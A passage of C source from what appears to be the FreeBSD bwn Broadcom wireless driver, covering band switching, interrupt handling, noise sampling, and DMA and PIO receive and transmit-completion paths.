(kidx * 2), (kidx << 4) | algorithm); offset = mac->mac_ktp + (index * BWN_SEC_KEYSIZE); for (i = 0; i < BWN_SEC_KEYSIZE; i += 2) { value = key[i]; value |= (uint16_t)(key[i + 1]) << 8; bwn_shm_write_2(mac, BWN_SHARED, offset + i, value); } } static void bwn_phy_exit(struct bwn_mac *mac) { mac->mac_phy.rf_onoff(mac, 0); if (mac->mac_phy.exit != NULL) mac->mac_phy.exit(mac); } static void bwn_dma_free(struct bwn_mac *mac) { struct bwn_dma *dma; if ((mac->mac_flags & BWN_MAC_FLAG_DMA) == 0) return; dma = &mac->mac_method.dma; bwn_dma_ringfree(&dma->rx); bwn_dma_ringfree(&dma->wme[WME_AC_BK]); bwn_dma_ringfree(&dma->wme[WME_AC_BE]); bwn_dma_ringfree(&dma->wme[WME_AC_VI]); bwn_dma_ringfree(&dma->wme[WME_AC_VO]); bwn_dma_ringfree(&dma->mcast); } static void bwn_core_stop(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; BWN_ASSERT_LOCKED(sc); if (mac->mac_status < BWN_MAC_STATUS_STARTED) return; callout_stop(&sc->sc_rfswitch_ch); callout_stop(&sc->sc_task_ch); callout_stop(&sc->sc_watchdog_ch); sc->sc_watchdog_timer = 0; BWN_WRITE_4(mac, BWN_INTR_MASK, 0); BWN_READ_4(mac, BWN_INTR_MASK); bwn_mac_suspend(mac); mac->mac_status = BWN_MAC_STATUS_INITED; } static int bwn_switch_band(struct bwn_softc *sc, struct ieee80211_channel *chan) { struct bwn_mac *up_dev = NULL; struct bwn_mac *down_dev; struct bwn_mac *mac; int err, status; uint8_t gmode; BWN_ASSERT_LOCKED(sc); TAILQ_FOREACH(mac, &sc->sc_maclist, mac_list) { if (IEEE80211_IS_CHAN_2GHZ(chan) && mac->mac_phy.supports_2ghz) { up_dev = mac; gmode = 1; } else if (IEEE80211_IS_CHAN_5GHZ(chan) && mac->mac_phy.supports_5ghz) { up_dev = mac; gmode = 0; } else { KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (EINVAL); } if (up_dev != NULL) break; } if (up_dev == NULL) { device_printf(sc->sc_dev, "Could not find a device\n"); return (ENODEV); } if (up_dev == sc->sc_curmac && sc->sc_curmac->mac_phy.gmode == gmode) return (0); device_printf(sc->sc_dev, "switching to %s-GHz band\n", IEEE80211_IS_CHAN_2GHZ(chan) ? "2" : "5"); down_dev = sc->sc_curmac; status = down_dev->mac_status; if (status >= BWN_MAC_STATUS_STARTED) bwn_core_stop(down_dev); if (status >= BWN_MAC_STATUS_INITED) bwn_core_exit(down_dev); if (down_dev != up_dev) bwn_phy_reset(down_dev); up_dev->mac_phy.gmode = gmode; if (status >= BWN_MAC_STATUS_INITED) { err = bwn_core_init(up_dev); if (err) { device_printf(sc->sc_dev, "fatal: failed to initialize for %s-GHz\n", IEEE80211_IS_CHAN_2GHZ(chan) ? 
"2" : "5"); goto fail; } } if (status >= BWN_MAC_STATUS_STARTED) bwn_core_start(up_dev); KASSERT(up_dev->mac_status == status, ("%s: fail", __func__)); sc->sc_curmac = up_dev; return (0); fail: sc->sc_curmac = NULL; return (err); } static void bwn_rf_turnon(struct bwn_mac *mac) { bwn_mac_suspend(mac); mac->mac_phy.rf_onoff(mac, 1); mac->mac_phy.rf_on = 1; bwn_mac_enable(mac); } static void bwn_rf_turnoff(struct bwn_mac *mac) { bwn_mac_suspend(mac); mac->mac_phy.rf_onoff(mac, 0); mac->mac_phy.rf_on = 0; bwn_mac_enable(mac); } static void bwn_phy_reset(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; siba_write_4(sc->sc_dev, SIBA_TGSLOW, ((siba_read_4(sc->sc_dev, SIBA_TGSLOW) & ~BWN_TGSLOW_SUPPORT_G) | BWN_TGSLOW_PHYRESET) | SIBA_TGSLOW_FGC); DELAY(1000); siba_write_4(sc->sc_dev, SIBA_TGSLOW, (siba_read_4(sc->sc_dev, SIBA_TGSLOW) & ~SIBA_TGSLOW_FGC) | BWN_TGSLOW_PHYRESET); DELAY(1000); } static int bwn_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct bwn_vap *bvp = BWN_VAP(vap); struct ieee80211com *ic= vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; enum ieee80211_state ostate = vap->iv_state; struct bwn_softc *sc = ifp->if_softc; struct bwn_mac *mac = sc->sc_curmac; int error; DPRINTF(sc, BWN_DEBUG_STATE, "%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate]); error = bvp->bv_newstate(vap, nstate, arg); if (error != 0) return (error); BWN_LOCK(sc); bwn_led_newstate(mac, nstate); /* * Clear the BSSID when we stop a STA */ if (vap->iv_opmode == IEEE80211_M_STA) { if (ostate == IEEE80211_S_RUN && nstate != IEEE80211_S_RUN) { /* * Clear out the BSSID. If we reassociate to * the same AP, this will reinialize things * correctly... */ if (ic->ic_opmode == IEEE80211_M_STA && (sc->sc_flags & BWN_FLAG_INVALID) == 0) { memset(sc->sc_bssid, 0, IEEE80211_ADDR_LEN); bwn_set_macaddr(mac); } } } if (vap->iv_opmode == IEEE80211_M_MONITOR || vap->iv_opmode == IEEE80211_M_AHDEMO) { /* XXX nothing to do? */ } else if (nstate == IEEE80211_S_RUN) { memcpy(sc->sc_bssid, vap->iv_bss->ni_bssid, IEEE80211_ADDR_LEN); memcpy(sc->sc_macaddr, IF_LLADDR(ifp), IEEE80211_ADDR_LEN); bwn_set_opmode(mac); bwn_set_pretbtt(mac); bwn_spu_setdelay(mac, 0); bwn_set_macaddr(mac); } BWN_UNLOCK(sc); return (error); } static void bwn_set_pretbtt(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ieee80211com *ic = sc->sc_ifp->if_l2com; uint16_t pretbtt; if (ic->ic_opmode == IEEE80211_M_IBSS) pretbtt = 2; else pretbtt = (mac->mac_phy.type == BWN_PHYTYPE_A) ? 
120 : 250; bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_PRETBTT, pretbtt); BWN_WRITE_2(mac, BWN_TSF_CFP_PRETBTT, pretbtt); } static int bwn_intr(void *arg) { struct bwn_mac *mac = arg; struct bwn_softc *sc = mac->mac_sc; uint32_t reason; if (mac->mac_status < BWN_MAC_STATUS_STARTED || (sc->sc_flags & BWN_FLAG_INVALID)) return (FILTER_STRAY); reason = BWN_READ_4(mac, BWN_INTR_REASON); if (reason == 0xffffffff) /* shared IRQ */ return (FILTER_STRAY); reason &= mac->mac_intr_mask; if (reason == 0) return (FILTER_HANDLED); mac->mac_reason[0] = BWN_READ_4(mac, BWN_DMA0_REASON) & 0x0001dc00; mac->mac_reason[1] = BWN_READ_4(mac, BWN_DMA1_REASON) & 0x0000dc00; mac->mac_reason[2] = BWN_READ_4(mac, BWN_DMA2_REASON) & 0x0000dc00; mac->mac_reason[3] = BWN_READ_4(mac, BWN_DMA3_REASON) & 0x0001dc00; mac->mac_reason[4] = BWN_READ_4(mac, BWN_DMA4_REASON) & 0x0000dc00; BWN_WRITE_4(mac, BWN_INTR_REASON, reason); BWN_WRITE_4(mac, BWN_DMA0_REASON, mac->mac_reason[0]); BWN_WRITE_4(mac, BWN_DMA1_REASON, mac->mac_reason[1]); BWN_WRITE_4(mac, BWN_DMA2_REASON, mac->mac_reason[2]); BWN_WRITE_4(mac, BWN_DMA3_REASON, mac->mac_reason[3]); BWN_WRITE_4(mac, BWN_DMA4_REASON, mac->mac_reason[4]); /* Disable interrupts. */ BWN_WRITE_4(mac, BWN_INTR_MASK, 0); mac->mac_reason_intr = reason; BWN_BARRIER(mac, BUS_SPACE_BARRIER_READ); BWN_BARRIER(mac, BUS_SPACE_BARRIER_WRITE); taskqueue_enqueue_fast(sc->sc_tq, &mac->mac_intrtask); return (FILTER_HANDLED); } static void bwn_intrtask(void *arg, int npending) { struct bwn_mac *mac = arg; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; uint32_t merged = 0; int i, tx = 0, rx = 0; BWN_LOCK(sc); if (mac->mac_status < BWN_MAC_STATUS_STARTED || (sc->sc_flags & BWN_FLAG_INVALID)) { BWN_UNLOCK(sc); return; } for (i = 0; i < N(mac->mac_reason); i++) merged |= mac->mac_reason[i]; if (mac->mac_reason_intr & BWN_INTR_MAC_TXERR) device_printf(sc->sc_dev, "MAC trans error\n"); if (mac->mac_reason_intr & BWN_INTR_PHY_TXERR) { DPRINTF(sc, BWN_DEBUG_INTR, "%s: PHY trans error\n", __func__); mac->mac_phy.txerrors--; if (mac->mac_phy.txerrors == 0) { mac->mac_phy.txerrors = BWN_TXERROR_MAX; bwn_restart(mac, "PHY TX errors"); } } if (merged & (BWN_DMAINTR_FATALMASK | BWN_DMAINTR_NONFATALMASK)) { if (merged & BWN_DMAINTR_FATALMASK) { device_printf(sc->sc_dev, "Fatal DMA error: %#x %#x %#x %#x %#x %#x\n", mac->mac_reason[0], mac->mac_reason[1], mac->mac_reason[2], mac->mac_reason[3], mac->mac_reason[4], mac->mac_reason[5]); bwn_restart(mac, "DMA error"); BWN_UNLOCK(sc); return; } if (merged & BWN_DMAINTR_NONFATALMASK) { device_printf(sc->sc_dev, "DMA error: %#x %#x %#x %#x %#x %#x\n", mac->mac_reason[0], mac->mac_reason[1], mac->mac_reason[2], mac->mac_reason[3], mac->mac_reason[4], mac->mac_reason[5]); } } if (mac->mac_reason_intr & BWN_INTR_UCODE_DEBUG) bwn_intr_ucode_debug(mac); if (mac->mac_reason_intr & BWN_INTR_TBTT_INDI) bwn_intr_tbtt_indication(mac); if (mac->mac_reason_intr & BWN_INTR_ATIM_END) bwn_intr_atim_end(mac); if (mac->mac_reason_intr & BWN_INTR_BEACON) bwn_intr_beacon(mac); if (mac->mac_reason_intr & BWN_INTR_PMQ) bwn_intr_pmq(mac); if (mac->mac_reason_intr & BWN_INTR_NOISESAMPLE_OK) bwn_intr_noise(mac); if (mac->mac_flags & BWN_MAC_FLAG_DMA) { if (mac->mac_reason[0] & BWN_DMAINTR_RX_DONE) { bwn_dma_rx(mac->mac_method.dma.rx); rx = 1; } } else rx = bwn_pio_rx(&mac->mac_method.pio.rx); KASSERT(!(mac->mac_reason[1] & BWN_DMAINTR_RX_DONE), ("%s", __func__)); KASSERT(!(mac->mac_reason[2] & BWN_DMAINTR_RX_DONE), ("%s", __func__)); KASSERT(!(mac->mac_reason[3] & 
BWN_DMAINTR_RX_DONE), ("%s", __func__)); KASSERT(!(mac->mac_reason[4] & BWN_DMAINTR_RX_DONE), ("%s", __func__)); KASSERT(!(mac->mac_reason[5] & BWN_DMAINTR_RX_DONE), ("%s", __func__)); if (mac->mac_reason_intr & BWN_INTR_TX_OK) { bwn_intr_txeof(mac); tx = 1; } BWN_WRITE_4(mac, BWN_INTR_MASK, mac->mac_intr_mask); if (sc->sc_blink_led != NULL && sc->sc_led_blink) { int evt = BWN_LED_EVENT_NONE; if (tx && rx) { if (sc->sc_rx_rate > sc->sc_tx_rate) evt = BWN_LED_EVENT_RX; else evt = BWN_LED_EVENT_TX; } else if (tx) { evt = BWN_LED_EVENT_TX; } else if (rx) { evt = BWN_LED_EVENT_RX; } else if (rx == 0) { evt = BWN_LED_EVENT_POLL; } if (evt != BWN_LED_EVENT_NONE) bwn_led_event(mac, evt); } if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0) { if (!IFQ_IS_EMPTY(&ifp->if_snd)) bwn_start_locked(ifp); } BWN_BARRIER(mac, BUS_SPACE_BARRIER_READ); BWN_BARRIER(mac, BUS_SPACE_BARRIER_WRITE); BWN_UNLOCK(sc); } static void bwn_restart(struct bwn_mac *mac, const char *msg) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; if (mac->mac_status < BWN_MAC_STATUS_INITED) return; device_printf(sc->sc_dev, "HW reset: %s\n", msg); ieee80211_runtask(ic, &mac->mac_hwreset); } static void bwn_intr_ucode_debug(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint16_t reason; if (mac->mac_fw.opensource == 0) return; reason = bwn_shm_read_2(mac, BWN_SCRATCH, BWN_DEBUGINTR_REASON_REG); switch (reason) { case BWN_DEBUGINTR_PANIC: bwn_handle_fwpanic(mac); break; case BWN_DEBUGINTR_DUMP_SHM: device_printf(sc->sc_dev, "BWN_DEBUGINTR_DUMP_SHM\n"); break; case BWN_DEBUGINTR_DUMP_REGS: device_printf(sc->sc_dev, "BWN_DEBUGINTR_DUMP_REGS\n"); break; case BWN_DEBUGINTR_MARKER: device_printf(sc->sc_dev, "BWN_DEBUGINTR_MARKER\n"); break; default: device_printf(sc->sc_dev, "ucode debug unknown reason: %#x\n", reason); } bwn_shm_write_2(mac, BWN_SCRATCH, BWN_DEBUGINTR_REASON_REG, BWN_DEBUGINTR_ACK); } static void bwn_intr_tbtt_indication(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ieee80211com *ic = sc->sc_ifp->if_l2com; if (ic->ic_opmode != IEEE80211_M_HOSTAP) bwn_psctl(mac, 0); if (ic->ic_opmode == IEEE80211_M_IBSS) mac->mac_flags |= BWN_MAC_FLAG_DFQVALID; } static void bwn_intr_atim_end(struct bwn_mac *mac) { if (mac->mac_flags & BWN_MAC_FLAG_DFQVALID) { BWN_WRITE_4(mac, BWN_MACCMD, BWN_READ_4(mac, BWN_MACCMD) | BWN_MACCMD_DFQ_VALID); mac->mac_flags &= ~BWN_MAC_FLAG_DFQVALID; } } static void bwn_intr_beacon(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ieee80211com *ic = sc->sc_ifp->if_l2com; uint32_t cmd, beacon0, beacon1; if (ic->ic_opmode == IEEE80211_M_HOSTAP || ic->ic_opmode == IEEE80211_M_MBSS) return; mac->mac_intr_mask &= ~BWN_INTR_BEACON; cmd = BWN_READ_4(mac, BWN_MACCMD); beacon0 = (cmd & BWN_MACCMD_BEACON0_VALID); beacon1 = (cmd & BWN_MACCMD_BEACON1_VALID); if (beacon0 && beacon1) { BWN_WRITE_4(mac, BWN_INTR_REASON, BWN_INTR_BEACON); mac->mac_intr_mask |= BWN_INTR_BEACON; return; } if (sc->sc_flags & BWN_FLAG_NEED_BEACON_TP) { sc->sc_flags &= ~BWN_FLAG_NEED_BEACON_TP; bwn_load_beacon0(mac); bwn_load_beacon1(mac); cmd = BWN_READ_4(mac, BWN_MACCMD); cmd |= BWN_MACCMD_BEACON0_VALID; BWN_WRITE_4(mac, BWN_MACCMD, cmd); } else { if (!beacon0) { bwn_load_beacon0(mac); cmd = BWN_READ_4(mac, BWN_MACCMD); cmd |= BWN_MACCMD_BEACON0_VALID; BWN_WRITE_4(mac, BWN_MACCMD, cmd); } else if (!beacon1) { bwn_load_beacon1(mac); cmd = BWN_READ_4(mac, BWN_MACCMD); cmd |= BWN_MACCMD_BEACON1_VALID; BWN_WRITE_4(mac, BWN_MACCMD, cmd); } } } 
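/*
 * PMQ interrupt: the handler below spins until bit 0x8 of BWN_PS_STATUS
 * clears, then writes 0x0002 back to the register (16-bit write).
 */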
static void bwn_intr_pmq(struct bwn_mac *mac) { uint32_t tmp; while (1) { tmp = BWN_READ_4(mac, BWN_PS_STATUS); if (!(tmp & 0x00000008)) break; } BWN_WRITE_2(mac, BWN_PS_STATUS, 0x0002); } static void bwn_intr_noise(struct bwn_mac *mac) { struct bwn_phy_g *pg = &mac->mac_phy.phy_g; uint16_t tmp; uint8_t noise[4]; uint8_t i, j; int32_t average; if (mac->mac_phy.type != BWN_PHYTYPE_G) return; KASSERT(mac->mac_noise.noi_running, ("%s: fail", __func__)); *((uint32_t *)noise) = htole32(bwn_jssi_read(mac)); if (noise[0] == 0x7f || noise[1] == 0x7f || noise[2] == 0x7f || noise[3] == 0x7f) goto new; KASSERT(mac->mac_noise.noi_nsamples < 8, ("%s:%d: fail", __func__, __LINE__)); i = mac->mac_noise.noi_nsamples; noise[0] = MIN(MAX(noise[0], 0), N(pg->pg_nrssi_lt) - 1); noise[1] = MIN(MAX(noise[1], 0), N(pg->pg_nrssi_lt) - 1); noise[2] = MIN(MAX(noise[2], 0), N(pg->pg_nrssi_lt) - 1); noise[3] = MIN(MAX(noise[3], 0), N(pg->pg_nrssi_lt) - 1); mac->mac_noise.noi_samples[i][0] = pg->pg_nrssi_lt[noise[0]]; mac->mac_noise.noi_samples[i][1] = pg->pg_nrssi_lt[noise[1]]; mac->mac_noise.noi_samples[i][2] = pg->pg_nrssi_lt[noise[2]]; mac->mac_noise.noi_samples[i][3] = pg->pg_nrssi_lt[noise[3]]; mac->mac_noise.noi_nsamples++; if (mac->mac_noise.noi_nsamples == 8) { average = 0; for (i = 0; i < 8; i++) { for (j = 0; j < 4; j++) average += mac->mac_noise.noi_samples[i][j]; } average = (((average / 32) * 125) + 64) / 128; tmp = (bwn_shm_read_2(mac, BWN_SHARED, 0x40c) / 128) & 0x1f; if (tmp >= 8) average += 2; else average -= 25; average -= (tmp == 8) ? 72 : 48; mac->mac_stats.link_noise = average; mac->mac_noise.noi_running = 0; return; } new: bwn_noise_gensample(mac); } static int bwn_pio_rx(struct bwn_pio_rxqueue *prq) { struct bwn_mac *mac = prq->prq_mac; struct bwn_softc *sc = mac->mac_sc; unsigned int i; BWN_ASSERT_LOCKED(sc); if (mac->mac_status < BWN_MAC_STATUS_STARTED) return (0); for (i = 0; i < 5000; i++) { if (bwn_pio_rxeof(prq) == 0) break; } if (i >= 5000) device_printf(sc->sc_dev, "too many RX frames in PIO mode\n"); return ((i > 0) ? 1 : 0); } static void bwn_dma_rx(struct bwn_dma_ring *dr) { int slot, curslot; KASSERT(!dr->dr_tx, ("%s:%d: fail", __func__, __LINE__)); curslot = dr->get_curslot(dr); KASSERT(curslot >= 0 && curslot < dr->dr_numslots, ("%s:%d: fail", __func__, __LINE__)); slot = dr->dr_curslot; for (; slot != curslot; slot = bwn_dma_nextslot(dr, slot)) bwn_dma_rxeof(dr, &slot); bus_dmamap_sync(dr->dr_ring_dtag, dr->dr_ring_dmap, BUS_DMASYNC_PREWRITE); dr->set_curslot(dr, slot); dr->dr_curslot = slot; } static void bwn_intr_txeof(struct bwn_mac *mac) { struct bwn_txstatus stat; uint32_t stat0, stat1; uint16_t tmp; BWN_ASSERT_LOCKED(mac->mac_sc); while (1) { stat0 = BWN_READ_4(mac, BWN_XMITSTAT_0); if (!(stat0 & 0x00000001)) break; stat1 = BWN_READ_4(mac, BWN_XMITSTAT_1); stat.cookie = (stat0 >> 16); stat.seq = (stat1 & 0x0000ffff); stat.phy_stat = ((stat1 & 0x00ff0000) >> 16); tmp = (stat0 & 0x0000ffff); stat.framecnt = ((tmp & 0xf000) >> 12); stat.rtscnt = ((tmp & 0x0f00) >> 8); stat.sreason = ((tmp & 0x001c) >> 2); stat.pm = (tmp & 0x0080) ? 1 : 0; stat.im = (tmp & 0x0040) ? 1 : 0; stat.ampdu = (tmp & 0x0020) ? 1 : 0; stat.ack = (tmp & 0x0002) ? 
1 : 0; bwn_handle_txeof(mac, &stat); } } static void bwn_hwreset(void *arg, int npending) { struct bwn_mac *mac = arg; struct bwn_softc *sc = mac->mac_sc; int error = 0; int prev_status; BWN_LOCK(sc); prev_status = mac->mac_status; if (prev_status >= BWN_MAC_STATUS_STARTED) bwn_core_stop(mac); if (prev_status >= BWN_MAC_STATUS_INITED) bwn_core_exit(mac); if (prev_status >= BWN_MAC_STATUS_INITED) { error = bwn_core_init(mac); if (error) goto out; } if (prev_status >= BWN_MAC_STATUS_STARTED) bwn_core_start(mac); out: if (error) { device_printf(sc->sc_dev, "%s: failed (%d)\n", __func__, error); sc->sc_curmac = NULL; } BWN_UNLOCK(sc); } static void bwn_handle_fwpanic(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint16_t reason; reason = bwn_shm_read_2(mac, BWN_SCRATCH, BWN_FWPANIC_REASON_REG); device_printf(sc->sc_dev,"fw panic (%u)\n", reason); if (reason == BWN_FWPANIC_RESTART) bwn_restart(mac, "ucode panic"); } static void bwn_load_beacon0(struct bwn_mac *mac) { KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } static void bwn_load_beacon1(struct bwn_mac *mac) { KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } static uint32_t bwn_jssi_read(struct bwn_mac *mac) { uint32_t val = 0; val = bwn_shm_read_2(mac, BWN_SHARED, 0x08a); val <<= 16; val |= bwn_shm_read_2(mac, BWN_SHARED, 0x088); return (val); } static void bwn_noise_gensample(struct bwn_mac *mac) { uint32_t jssi = 0x7f7f7f7f; bwn_shm_write_2(mac, BWN_SHARED, 0x088, (jssi & 0x0000ffff)); bwn_shm_write_2(mac, BWN_SHARED, 0x08a, (jssi & 0xffff0000) >> 16); BWN_WRITE_4(mac, BWN_MACCMD, BWN_READ_4(mac, BWN_MACCMD) | BWN_MACCMD_BGNOISE); } static int bwn_dma_freeslot(struct bwn_dma_ring *dr) { BWN_ASSERT_LOCKED(dr->dr_mac->mac_sc); return (dr->dr_numslots - dr->dr_usedslot); } static int bwn_dma_nextslot(struct bwn_dma_ring *dr, int slot) { BWN_ASSERT_LOCKED(dr->dr_mac->mac_sc); KASSERT(slot >= -1 && slot <= dr->dr_numslots - 1, ("%s:%d: fail", __func__, __LINE__)); if (slot == dr->dr_numslots - 1) return (0); return (slot + 1); } static void bwn_dma_rxeof(struct bwn_dma_ring *dr, int *slot) { struct bwn_mac *mac = dr->dr_mac; struct bwn_softc *sc = mac->mac_sc; struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_dmadesc_generic *desc; struct bwn_dmadesc_meta *meta; struct bwn_rxhdr4 *rxhdr; struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; uint32_t macstat; int32_t tmp; int cnt = 0; uint16_t len; dr->getdesc(dr, *slot, &desc, &meta); bus_dmamap_sync(dma->rxbuf_dtag, meta->mt_dmap, BUS_DMASYNC_POSTREAD); m = meta->mt_m; if (bwn_dma_newbuf(dr, desc, meta, 0)) { ifp->if_ierrors++; return; } rxhdr = mtod(m, struct bwn_rxhdr4 *); len = le16toh(rxhdr->frame_len); if (len <= 0) { ifp->if_ierrors++; return; } if (bwn_dma_check_redzone(dr, m)) { device_printf(sc->sc_dev, "redzone error.\n"); bwn_dma_set_redzone(dr, m); bus_dmamap_sync(dma->rxbuf_dtag, meta->mt_dmap, BUS_DMASYNC_PREWRITE); return; } if (len > dr->dr_rx_bufsize) { tmp = len; while (1) { dr->getdesc(dr, *slot, &desc, &meta); bwn_dma_set_redzone(dr, meta->mt_m); bus_dmamap_sync(dma->rxbuf_dtag, meta->mt_dmap, BUS_DMASYNC_PREWRITE); *slot = bwn_dma_nextslot(dr, *slot); cnt++; tmp -= dr->dr_rx_bufsize; if (tmp <= 0) break; } device_printf(sc->sc_dev, "too small buffer " "(len %u buffer %u dropped %d)\n", len, dr->dr_rx_bufsize, cnt); return; } macstat = le32toh(rxhdr->mac_status); if (macstat & BWN_RX_MAC_FCSERR) { if (!(mac->mac_sc->sc_filters & BWN_MACCTL_PASS_BADFCS)) { device_printf(sc->sc_dev, "RX drop\n"); return; } } m->m_pkthdr.rcvif = ifp; m->m_len = 
m->m_pkthdr.len = len + dr->dr_frameoffset; m_adj(m, dr->dr_frameoffset); bwn_rxeof(dr->dr_mac, m, rxhdr); } static void bwn_handle_txeof(struct bwn_mac *mac, const struct bwn_txstatus *status) { struct bwn_dma_ring *dr; struct bwn_dmadesc_generic *desc; struct bwn_dmadesc_meta *meta; struct bwn_pio_txqueue *tq; struct bwn_pio_txpkt *tp = NULL; struct bwn_softc *sc = mac->mac_sc; struct bwn_stats *stats = &mac->mac_stats; struct ieee80211_node *ni; struct ieee80211vap *vap; int retrycnt = 0, slot; BWN_ASSERT_LOCKED(mac->mac_sc); if (status->im) device_printf(sc->sc_dev, "TODO: STATUS IM\n"); if (status->ampdu) device_printf(sc->sc_dev, "TODO: STATUS AMPDU\n"); if (status->rtscnt) { if (status->rtscnt == 0xf) stats->rtsfail++; else stats->rts++; } if (mac->mac_flags & BWN_MAC_FLAG_DMA) { if (status->ack) { dr = bwn_dma_parse_cookie(mac, status, status->cookie, &slot); if (dr == NULL) { device_printf(sc->sc_dev, "failed to parse cookie\n"); return; } while (1) { dr->getdesc(dr, slot, &desc, &meta); if (meta->mt_islast) { ni = meta->mt_ni; vap = ni->ni_vap; ieee80211_ratectl_tx_complete(vap, ni, status->ack ? IEEE80211_RATECTL_TX_SUCCESS : IEEE80211_RATECTL_TX_FAILURE, &retrycnt, 0); break; } slot = bwn_dma_nextslot(dr, slot); } } bwn_dma_handle_txeof(mac, status); } else { if (status->ack) { tq = bwn_pio_parse_cookie(mac, status->cookie, &tp); if (tq == NULL) { device_printf(sc->sc_dev, "failed to parse cookie\n"); return; } ni = tp->tp_ni; vap = ni->ni_vap; ieee80211_ratectl_tx_complete(vap, ni, status->ack ? IEEE80211_RATECTL_TX_SUCCESS : IEEE80211_RATECTL_TX_FAILURE, &retrycnt, 0); } bwn_pio_handle_txeof(mac, status); } bwn_phy_txpower_check(mac, 0); } static uint8_t bwn_pio_rxeof(struct bwn_pio_rxqueue *prq) { struct bwn_mac *mac = prq->prq_mac; struct bwn_softc *sc = mac->mac_sc; struct bwn_rxhdr4 rxhdr; struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; uint32_t ctl32, macstat, v32; unsigned int i, padding; uint16_t ctl16, len, totlen, v16; unsigned char *mp; char *data; memset(&rxhdr, 0, sizeof(rxhdr)); if (prq->prq_rev >= 8) { ctl32 = bwn_pio_rx_read_4(prq, BWN_PIO8_RXCTL); if (!(ctl32 & BWN_PIO8_RXCTL_FRAMEREADY)) return (0); bwn_pio_rx_write_4(prq, BWN_PIO8_RXCTL, BWN_PIO8_RXCTL_FRAMEREADY); for (i = 0; i < 10; i++) { ctl32 = bwn_pio_rx_read_4(prq, BWN_PIO8_RXCTL); if (ctl32 & BWN_PIO8_RXCTL_DATAREADY) goto ready; DELAY(10); } } else { ctl16 = bwn_pio_rx_read_2(prq, BWN_PIO_RXCTL); if (!(ctl16 & BWN_PIO_RXCTL_FRAMEREADY)) return (0); bwn_pio_rx_write_2(prq, BWN_PIO_RXCTL, BWN_PIO_RXCTL_FRAMEREADY); for (i = 0; i < 10; i++) { ctl16 = bwn_pio_rx_read_2(prq, BWN_PIO_RXCTL); if (ctl16 & BWN_PIO_RXCTL_DATAREADY) goto ready; DELAY(10); } } device_printf(sc->sc_dev, "%s: timed out\n", __func__); return (1); ready: if (prq->prq_rev >= 8) siba_read_multi_4(sc->sc_dev, &rxhdr, sizeof(rxhdr), prq->prq_base + BWN_PIO8_RXDATA); else siba_read_multi_2(sc->sc_dev, &rxhdr, sizeof(rxhdr), prq->prq_base + BWN_PIO_RXDATA); len = le16toh(rxhdr.frame_len); if (len > 0x700) { device_printf(sc->sc_dev, "%s: len is too big\n", __func__); goto error; } if (len == 0) { device_printf(sc->sc_dev, "%s: len is 0\n", __func__); goto error; } macstat = le32toh(rxhdr.mac_status); if (macstat & BWN_RX_MAC_FCSERR) { if (!(mac->mac_sc->sc_filters & BWN_MACCTL_PASS_BADFCS)) { device_printf(sc->sc_dev, "%s: FCS error", __func__); goto error; } } padding = (macstat & BWN_RX_MAC_PADDING) ? 
2 : 0; totlen = len + padding; KASSERT(totlen <= MCLBYTES, ("too big..\n")); m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (m == NULL) { device_printf(sc->sc_dev, "%s: out of memory", __func__); goto error; } mp = mtod(m, unsigned char *); if (prq->prq_rev >= 8) { siba_read_multi_4(sc->sc_dev, mp, (totlen & ~3), prq->prq_base + BWN_PIO8_RXDATA); if (totlen & 3) { v32 = bwn_pio_rx_read_4(prq, BWN_PIO8_RXDATA); data = &(mp[totlen - 1]); switch (totlen & 3) { case 3: *data = (v32 >> 16); data--; case 2: *data = (v32 >> 8); data--; case 1: *data = v32; } } } else { siba_read_multi_2(sc->sc_dev, mp, (totlen & ~1), prq->prq_base + BWN_PIO_RXDATA); if (totlen & 1) { v16 = bwn_pio_rx_read_2(prq, BWN_PIO_RXDATA); mp[totlen - 1] = v16; } } m->m_pkthdr.rcvif = ifp; m->m_len = m->m_pkthdr.len = totlen; bwn_rxeof(prq->prq_mac, m, &rxhdr); return (1); error: if (prq->prq_rev >= 8) bwn_pio_rx_write_4(prq, BWN_PIO8_RXCTL, BWN_PIO8_RXCTL_DATAREADY); else bwn_pio_rx_write_2(prq, BWN_PIO_RXCTL, BWN_PIO_RXCTL_DATAREADY); return (1); } static int bwn_dma_newbuf(struct bwn_dma_ring *dr, struct bwn_dmadesc_generic *desc, struct bwn_dmadesc_meta *meta, int init) { struct bwn_mac *mac = dr->dr_mac; struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_rxhdr4 *hdr; bus_dmamap_t map; bus_addr_t paddr; struct mbuf *m; int error; m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (m == NULL) { error = ENOBUFS; /* * If the NIC is up and running, we need to: * - Clear RX buffer's header. * - Restore RX descriptor settings. */ if (init) return (error); else goto back; } m->m_len = m->m_pkthdr.len = MCLBYTES; bwn_dma_set_redzone(dr, m); /* * Try to load RX buf into temporary DMA map */ error = bus_dmamap_load_mbuf(dma->rxbuf_dtag, dr->dr_spare_dmap, m, bwn_dma_buf_addr, &paddr, BUS_DMA_NOWAIT); if (error) { m_freem(m); /* * See the comment above */ if (init) return (error); else goto back; } if (!init) bus_dmamap_unload(dma->rxbuf_dtag, meta->mt_dmap); meta->mt_m = m; meta->mt_paddr = paddr; /* * Swap RX buf's DMA map with the loaded temporary one */ map = meta->mt_dmap; 